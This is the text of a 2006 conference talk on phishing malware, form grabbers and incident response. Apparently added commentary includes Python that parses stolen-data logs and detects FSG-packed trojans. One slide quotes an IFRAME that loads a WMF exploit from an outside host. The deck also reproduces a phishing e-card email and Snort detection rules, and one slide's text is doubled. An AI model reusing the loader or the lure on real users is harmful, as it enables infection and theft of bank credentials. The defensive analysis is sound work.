For Distribution Copyright 2006 Secure Science Corp. 1
Trojans & Botnets & Malware, Oh My!
Shmoocon '06
Lance James
Secure Science Corporation
What this talk is about
- Malware, in regards to incident response
- Pre-emptive techniques
- Research & development
- Related mainly to theft-intended malware

What is Malware?
- Malicious software/hardware
- Designed to be harmful
Cyber Attack Sophistication Continues To Evolve
[Chart, source: CERT. X axis: 1980, 1985, 1990, 1995, 2000+. Y axis: Intruder Knowledge / Attack Sophistication, Low to High. Two curves: Tools and Attackers. Milestones plotted: password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, sweepers, sniffers, packet spoofing, GUI, automated probes/scans, denial of service, www attacks, "stealth"/advanced scanning techniques, burglaries, network mgmt. diagnostics, distributed attack tools, cross site scripting, staged attack, bots.]
And Continue To Grow…
- Data theft grew more than 650% over the past 3 years (CSI/FBI)
- 137,000 security incidents in 2003, nearly twice as many as in 2002 (CERT)
- Avg reported loss from attacks was $2.7M per incident (CSI/FBI survey)
- 85% of respondents had breaches (CSI/FBI survey)
- 85% of the critical infrastructure is owned or operated by the private sector
Source: Carnegie Mellon
Growth Or Liability?
- Over twenty per cent of Internet users now access online banking services.
- This total will reach 33% by 2006, according to The Online Banking Report.
- By 2010, over 55 million US households will use online banking and ePayments services, which are tipped as "growth areas".
- Wamu buys Providian, BofA buys MBNA
- And so what about the 'Phishing' threat to e-commerce?
Source: ePaynews
What Is Phishing?
- Phishing, also referred to as brand spoofing, is a variation on "fishing": bait is thrown out in the hope that while most will ignore it, some will be tempted into biting.
- Phishing is the act of sending a communication to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surrendering private information that will be used for identity theft.
- The communication (usually email) directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has.
- The Web site, however, is bogus or hostile and set up only to steal the user's information.
What's Worse? Email Phish or Phishing Malware?
- Some of the larger phishing groups have associations with both phishing emails and key-logging malware.
- While phishing email is very effective, the number of victims is significantly smaller than the victims of phishing malware.
- Logs recovered from base camps for phishing emails and malware show a startling difference.
Email -vs- Malware

Average number of accounts compromised in a week
  Phishing Malware / Keyloggers: 500,000
  Phishing Emails: 100

Type of information compromised
  Phishing Malware / Keyloggers: Account login, or credit card number with expiration and address. Generally, a single victim only loses a single piece of information. Few victims lose more than one type of information. And the information compromised may not match the information desired by the phisher.
  Phishing Emails: Name, address, phone, SSN, credit card, CVV2, bank account numbers, logins and passwords, and even items such as mother's maiden name or the answer to the "forgot your password" prompt. Generally, victims provide all of the information asked.

Volume of data generated
  Phishing Malware / Keyloggers: A single key logging Trojan can generate hundreds of megabytes of data in a week. The data is not processed by hand. Instead, scripts are used to filter the information. Potentially valuable information is frequently ignored due to the filtering process.
  Phishing Emails: Each victim = < 500 bytes of data. 1 week = < 50 Kbytes. A single person can process the data in minutes.
Email -vs- Malware (cont.)

Total development cost to the phishers?
  Phishing Malware / Key loggers: A single malware system, including Trojan and receiving server, may take months to develop. Each variant may take a week or longer to develop. When generic anti-virus signatures appear, redevelopment may take weeks or months.
  Phishing Emails: A single phishing server may take one week to develop. The server may then be applied to hundreds of blind drop servers and reused for weeks or longer. Changes to the phishing email content (bait) can be measured in hours and may not need a change to the phishing server.

How often is the method viable?
  Phishing Malware / Key loggers: Most malware is effective for a week before anti-virus vendors develop signatures. Some phishing groups use malware in limited distributions. While these programs may exist for much longer durations, they generally collect less information. A single person that is infected may compromise the same information multiple times.
  Phishing Emails: Reused regularly for weeks or months before requiring a change. Due to simple changes in the mailing list, a variety of people can be solicited; information is almost never collected from the same person twice.
Phishing Malware (cont.)
- In November of 2003, the concept of a single mega-virus changed.
- Gaobot, followed by Sasser and Berbew, took a different tack: rather than one mega-worm, these consisted of hundreds of variants, each slightly different.
- The goal of the variant was not to become a mega-worm, but rather to infect a small group of systems.
Phishing Malware (cont.)
This approach provided two key benefits to the malware authors:
- Limited distribution; limited detection. As long as the malware is not widespread, the anti-virus vendors would be less likely to detect the malware. (If Norton doesn't know about a virus, then they cannot create a detection signature for the virus.)
  Over the last 12 months Secure Science Corporation has identified dozens of virus variants used by phishers, carders, and generic malware authors that are not detected by anti-virus software.
- Rapid deployment. Nearly a hundred variants of Sasser were identified in less than three months. Each variant requires a different detection signature. The rapid modification and deployment ensures that anti-virus vendors will overtax their available resources, becoming less responsive to new strains. It also ensures that some variants will not be detected.
Phishing Malware (cont.)
- We're seeing a significant increase in malware used by phishing groups.
- IE exploitation via ActiveX blended threats
- Let's take a closer look at the malware, and the threat model behind phishers and their malware.
- Malware key-logging myths
Phishing Malware (cont.)
- A few phishing groups have been associated with specific malware.
- The malware is used for a variety of purposes:
  - Compromising hosts for operating the phishing server;
  - Compromising hosts for relaying the bulk mailing;
  - Directly attacking clients with key-logging software.
- A single piece of malware may serve any or all of these purposes.
Malware Trends
In early 2004, the malware associated with phishing groups rarely appeared to be created specifically for phishing. Instead, it was focused on botnet* attributes:
- Email relay. The software opens network services that can be used to relay email anonymously. This is valuable to phishers, and spammers in general.
- Data mining. The malware frequently contains built-in functions for gathering information from the local system. The gathering usually focuses on software licenses (for game players, warez, or serialz dealers**) and Internet Explorer cache. The latter may contain information such as logins. For phishers, this type of data mining primarily focuses on account logins to phishing targets.

* A compromised system with remote control capabilities is a "bot". A "botnet" is a collection of these compromised hosts.
** Illegally distributed software applications (warez) and the associated license keys (serialz) are frequently available and propagated through the underground software community.
Malware Trends (cont.)
- Remote control. The malware usually has backdoor capabilities. This permits a remote user to control and access the compromised host. For a phisher, there is little advantage to having a backdoor to a system unless they plan to use the server for hosting a phishing site. But for other people, such as virus writers or botnet farmers*, remote control is an essential attribute.

* A "botnet farmer" is an individual or group that manages and maintains one or more botnets. The botnet farmers generate revenue by selling systems or CPU time to other people. Essentially, the botnet becomes a large timeshare computer network.
Malware Trends (cont.)
- By Q3 of 2004, a few large phishing groups had evolved to support their own specific malware.
- While the malware did contain email relays, data mining functions, and remote control services, these had been tuned to support phishing specifically.
- Viruses such as W32.Spybot.Worm included specific code to harvest bank information from compromised hosts.
Malware Trends (cont.)
- A few phishing groups also appeared associated with key logging software.
- While not true "key logging", these applications capture data submitted (posted) to web servers.
- A true key logger would generate massive amounts of data, and it would be difficult for an automated system to identify account and login information in it.
Malware Trends (cont.)
- Instead, these applications hook into Internet Explorer's (IE) form submission system.
- All data from the submitted form is relayed to a blind drop operated by the phishers.
- The logs contain information about the infected system, as well as the URL and submitted form values.
- More importantly, the malware intercepts the data before it enters any secure network tunnel, such as SSL or HTTPS.
Malware Trends (cont.)
Examples of data output: recent examples of HaxDoor, Berbew and PWS.Banker reveal similar "Formgrabbing":

  reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=*******
  onlineid.bankofamerica.com/cgi-bin/sso.login.controller [11023586123662948896] [IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]

Distributed through IE Class-ID attacks: ADB/CHM, IFRAME tag, Javaprxy (?)
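The record above is one blind-drop line from a form grabber: the URL-encoded POST body exactly as IE was about to send it, then the target URL, a bot ID and an IP/timestamp. As an added example (not Secure Science code and not part of the original deck), the Python below parses a record of that shape, flags the non-empty fields an IR team would hand back to the targeted institution, and redacts the values so the record can be shared. The sample record is constructed from the redacted slide example; the credential field-name heuristic and the function names are this example's own assumptions, not anything the talk specifies.

```python
"""Parse a form-grabber blind-drop record like the one on the slide.

Added example, not code from the talk. Layout assumed from the slide: line 1 is
the URL-encoded POST body the victim submitted; line 2 is the target URL, a
bracketed victim/bot ID and a bracketed "IP:<addr> dd.mm.yyyy h:mm:ss" stamp.
"""
import re
from datetime import datetime
from urllib.parse import parse_qsl

# Constructed sample, modelled on the redacted record shown in the deck.
SAMPLE_RECORD = (
    "reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd="
    "&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******"
    "&state=MA&pc=*******\n"
    "onlineid.bankofamerica.com/cgi-bin/sso.login.controller [11023586123662948896] "
    "[IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]"
)

# Field-name fragments that usually carry credentials on bank login forms.
# This list is an assumption for the example, not something the talk specifies.
CREDENTIAL_HINTS = ("pass", "pswd", "pwd", "pin", "access_id", "login", "user", "acct", "card", "ssn")

META_RE = re.compile(
    r"^(?P<url>\S+)\s+\[(?P<victim_id>\d+)\]\s+"
    r"\[IP:(?P<ip>[^\s\]]+)\s+(?P<date>\d{2}\.\d{2}\.\d{4})\s+(?P<time>\d{1,2}:\d{2}:\d{2})\]$"
)


def parse_record(record):
    """Split one record into host, path, victim ID, IP, timestamp and form fields."""
    body, _, meta = record.strip().partition("\n")
    m = META_RE.match(meta.strip())
    if not m:
        raise ValueError("metadata line does not match the expected layout")
    host, _, path = m["url"].partition("/")
    # keep_blank_values=True so empty fields (acct=, pswd=) stay visible: they show
    # which inputs the victim left blank on that page, useful when matching a login flow.
    fields = dict(parse_qsl(body, keep_blank_values=True))
    when = datetime.strptime(f"{m['date']} {m['time']}", "%d.%m.%Y %H:%M:%S")
    return {
        "host": host,
        "path": "/" + path,
        "victim_id": m["victim_id"],
        "ip": m["ip"],
        "timestamp": when,
        "fields": fields,
    }


def credential_fields(fields):
    """Non-empty fields whose names look like credentials (heuristic, see above)."""
    return {
        name: value
        for name, value in fields.items()
        if value and any(hint in name.lower() for hint in CREDENTIAL_HINTS)
    }


def redact(fields):
    """Replace every non-empty value with its length, so the record can be shared."""
    return {name: f"<{len(value)} chars>" if value else "" for name, value in fields.items()}


def triage(record):
    """One-line summary an IR team might send to the targeted institution."""
    parsed = parse_record(record)
    creds = credential_fields(parsed["fields"])
    return (
        f"{parsed['host']} login captured {parsed['timestamp']:%Y-%m-%d %H:%M:%S}"
        f" from bot {parsed['victim_id']}: {', '.join(sorted(creds))}"
    )


if __name__ == "__main__":
    print(triage(SAMPLE_RECORD))
    print(redact(parse_record(SAMPLE_RECORD)["fields"]))
```

The point of keeping blank fields is that the grabber sees the whole form, not just what the victim typed; the empty acct/pswd pair next to a filled Access_ID/Current_Passcode pair tells you which of two login paths on the same page was used.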
Side-Bar, Case Example
Anti-Malware Snake-Oil
- Virtual keyboards
- Key-board logging protection
- Scramble pads
- Anti-spyware desktop software

99% of information theft malware doesn't log key strokes! (It's unscalable.)

Side-Bar, Case Example (cont.)
Malware Trends Malware Trends (cont.)(cont.)
The end of 2004 showed a significant modification The end of 2004 showed a significant modification to the malware used by some phishing groupsto the malware used by some phishing groups. . The prior key logging systems generated gigabytes of The prior key logging systems generated gigabytes of
data in a very short time. This made data mining data in a very short time. This made data mining difficult, since only a few sites were of interest to the difficult, since only a few sites were of interest to the phishers. phishers.
By the end of 2004 and into 2005, the phishers had By the end of 2004 and into 2005, the phishers had evolved their software. evolved their software.
Loggers focus on specific URLs, such as the web logins to Loggers focus on specific URLs, such as the web logins to Citibank and Bank of America. Citibank and Bank of America.
It is believed that this was intended to pre-filter the data It is believed that this was intended to pre-filter the data collected by the malware. Rather than collecting all of the collected by the malware. Rather than collecting all of the submitted data, only submitted data of interest was submitted data, only submitted data of interest was collected. collected.
More importantly, multiple viruses appeared with this More importantly, multiple viruses appeared with this capability – indicating that multiple phishing groups evolved capability – indicating that multiple phishing groups evolved at the same time. This strongly suggests that malware at the same time. This strongly suggests that malware developers associated with phishers are in communication developers associated with phishers are in communication or have a common influencing source.or have a common influencing source.
Malware Trends (cont.)
PG02 significant attack pattern identified
- Cpanel (WebISP in a box) exploitation
  - System compromise
  - Payload launch: www.site.com/images/newex.html
- Hijacks network or box for spamming
  - Sending spam
  - Uses DMS generation 2
  - Enabling anonymity: uses dark IP space for forged Received header
- Object Class exploits for IE
  - Trojan Downloader payload
  - Classifies malware as "MSITS.exe" (reference to MS-ITS protocol attacks)
  - Uses GPL code from www.edup.tudelft.nl/~bjwever/ (Berend-Jan Wever website)
Malware Trends (cont.)
- Object Class attacks not "brand new"
  - Uses older ADB exploit even though newer attacks exist
  - January-February 2005 Haxdoor variants existed for Win98
- Suggests targeting "End of Life" product
  - Win98 EOL on security upgrades
  - No education on phishing
  - No SP2 (built-in pop-up blocker)
- Evolutionary pattern
  - Suggests path of least resistance
  - Evolve when necessary
  - Win98 is plentiful and best target! Why move?
Latest Threats
- WMF exploit
  - Discovered by Dan Hubbard (WebSense)
  - Found in the wild as a 0-day
  - Phishers were using it from Day 0
  - It was supposed to be patched in November (MS05-053)
- Nuclear Grabber used by Phishing Group #02
  - Written by Corpse (author of A-311 Death and Nuclear Grabber)
  - AV vendors call it Haxdoor
  - Sells software on Corpsespyware.net from $250.00 to $2500.00
  - Russian sales only
Phishing Trends (cont.)
Serial pattern for process of Haxdoor
- Successor to Berbew malware from 2004
- Very likely relation to original Berbew authors
- '05 Berbew marked with Corpse's signature
- Haxdoor malware written in Assembly
- Trojan Creation Kit
  - Compiles with permutations
  - Packed with FSG
  - Easy for phishers to compile on the fly with customized settings
Latest Threats

Latest Threats (cont.)
Email from Phishing Group for WMF exploit

  Dear Friend,

  Friends [ fromfriends at aol.com ] has sent you an e-card from <A href="http://123Greetings.com">123Greetings.com</A> .

  <A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music.

  Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print.

  To view your e-card, choose from any of the following options:

  <a href=http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a href="http://mujergorda.bitacoras.com/base/index.html">http://www.123greetings.com/NY2006z3</td></tr></table></a>
Identify the Threat, Label it - Here's their analysis
What AV does with this?

Problem?
- Problem exists here
  - Labeled Low Threat based on AV metrics
  - Shoved in with the rest of the Trojan.small.em
  - No known resolve other than desktop prevention
- Very reactive (as we all know)
- Evolving malware disables AV (common knowledge)
- How do we change this?
  - Change the AV metric
  - Use common sense
  - Proactive, not reactive
  - Serial pattern analysis w/ common sense is key
Incident Response
- Emerging threats
  - Management by objective
  - Per incident basis
  - Threat modelling necessary (but usually never happens)
- Malware author grouping
  - Serial pattern
  - Pre-emptive signatures
  - Forces them to evolve (ROI lowers)
  - Possible apprehension
R&D + IR = Proactive
Research for Haxdoor:

  <IFRAME src="http://imkportedoor.com/images/ny.wmf" frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME>

- Grabs msits.exe from www.site.com/images/msits.exe
- Packed with FSG (marked with Corpse signature within packing)

  003C1BD1  PUSH ies4dll.003C1165  ASCII "www.pcpeek-webcam-sex.com"
  003C1BE0  PUSH ies4dll.003C11C9  ASCII "images/data.php"

- Blind drop identified
- Data recovered in realtime
- Phishing the Phishers

Data Recovery
Impact DOA
- Blind drop log monitoring
- Data returned to institution that's compromised
- Real-time risk mitigation

Pre-emptive Action
What do we know?
- Packed with FSG
  - How many non-malicious executables are packed with FSG?
- Talks to /images/data.php
  - Some versions /images/dat7.php and /images/bsrv.php
- Group titles it msits.exe and msys.exe
- Bleeding-Edge Snort:

  # |50 45 00 00| = "PE\0\0", |4C 01| Machine = i386, |02 00| NumberOfSections = 2, |46 53 47 21| TimeDateStamp field = "FSG!"
  alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;)

  alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)
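The two rules above fire on the packer, not on the payload: the second content string is the start of the PE header with the COFF TimeDateStamp field replaced by the ASCII marker "FSG!". As an added example (not Secure Science or Bleeding-Edge code), the Python below reproduces that check two ways over a constructed PE-shaped byte blob: a byte-pattern match approximating the rule's content/distance logic, and a structured check that follows e_lfanew and reads the TimeDateStamp field directly. The constructed blob and the helper names are this example's assumptions. The structured version also shows one reason the rule can miss: it hard-codes Machine=0x014C and NumberOfSections=2 next to the marker, so a stub with a different section count slips past the rule while the field check still flags it.

```python
"""Check a PE file for the FSG packer marker the Bleeding-Edge rules key on.

Added example, not code from the talk or from the rule set. The Snort content
|50 45 00 00 4C 01 02 00 46 53 47 21| is "PE\0\0" + Machine 0x014C (i386) +
NumberOfSections 2 + the 4-byte TimeDateStamp field holding "FSG!".
The PE blob built below is constructed test data, not a real sample.
"""
import struct

PE_FSG_CONTENT = b"\x50\x45\x00\x00\x4c\x01\x02\x00\x46\x53\x47\x21"  # bytes from the rule
FSG_MARKER = b"FSG!"


def build_pe_stub(time_date_stamp=FSG_MARKER, number_of_sections=2, e_lfanew=0x40):
    """Construct a minimal PE-shaped blob: DOS header, e_lfanew, then a COFF header."""
    dos = bytearray(b"MZ" + b"\x00" * (e_lfanew - 2))
    struct.pack_into("<I", dos, 0x3C, e_lfanew)          # e_lfanew points at "PE\0\0"
    coff = (
        b"PE\x00\x00"
        + struct.pack("<HH", 0x014C, number_of_sections)  # Machine, NumberOfSections
        + time_date_stamp                                 # 4-byte TimeDateStamp field
        + b"\x00" * 16                                    # rest of the COFF header
    )
    return bytes(dos) + coff


def rule_style_match(data, distance=10):
    """Approximate the Snort rule: "MZ", then the PE/FSG bytes starting at least
    `distance` bytes after the end of that match (the rule's distance:10)."""
    mz = data.find(b"MZ")
    if mz < 0:
        return False
    return data.find(PE_FSG_CONTENT, mz + 2 + distance) >= 0


def pe_time_date_stamp(data):
    """Structured check: follow e_lfanew and return the raw 4-byte TimeDateStamp."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    return data[e_lfanew + 8:e_lfanew + 12]


def is_fsg_packed(data):
    """True when the TimeDateStamp field carries the FSG marker, whatever the section count."""
    return pe_time_date_stamp(data) == FSG_MARKER


if __name__ == "__main__":
    for label, blob in (
        ("fsg, 2 sections", build_pe_stub()),
        ("fsg, 3 sections", build_pe_stub(number_of_sections=3)),
        ("real timestamp", build_pe_stub(time_date_stamp=struct.pack("<I", 0x43A0C000))),
    ):
        print(f"{label:16} rule={rule_style_match(blob)!s:5} field={is_fsg_packed(blob)}")
```

The structured check is what you would run over a quarantine directory to answer the slide's own question ("how many non-malicious executables are packed with FSG?") before deploying the rule network-wide; the rule-style function is what tells you whether a given sample would actually have tripped the IDS.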
Outcome
- Snort sigs
  - Prevent a large amount of new phishing malware
  - Corpse has to change his method
  - Many other phishing malware packed same way
- Problem response vs incident response
  - Look at overall problem
- Example: form grabbing
  - Assume everyone is infected
  - How do we solve this?

Example: Form Grabbing
So you're not an RCE: Tricks for IR
- IEHTTPHEADERS
  - BHO and IE hooks
  - Uses IE as agent
  - Locate blind drop
  - Monitor and mitigate
- VMWare
  - Sandbox (with snapshots)
  - Tools like Sysinternals, OllyDbg, Winpooch
  - Joe Stewart has some new tools for sandnet
- As it becomes more prevalent
  - More tools available for the common response team
- Common sense is sometimes the best weapon
Contact Info
Secure Science Corporation
7770 Regents Rd.
Suite 113-535
San Diego, CA 92122-1967
(877) 570-0455
http://www.securescience.net
Email: (redacted)@securescience.net
Lance James ~ CTO

Questions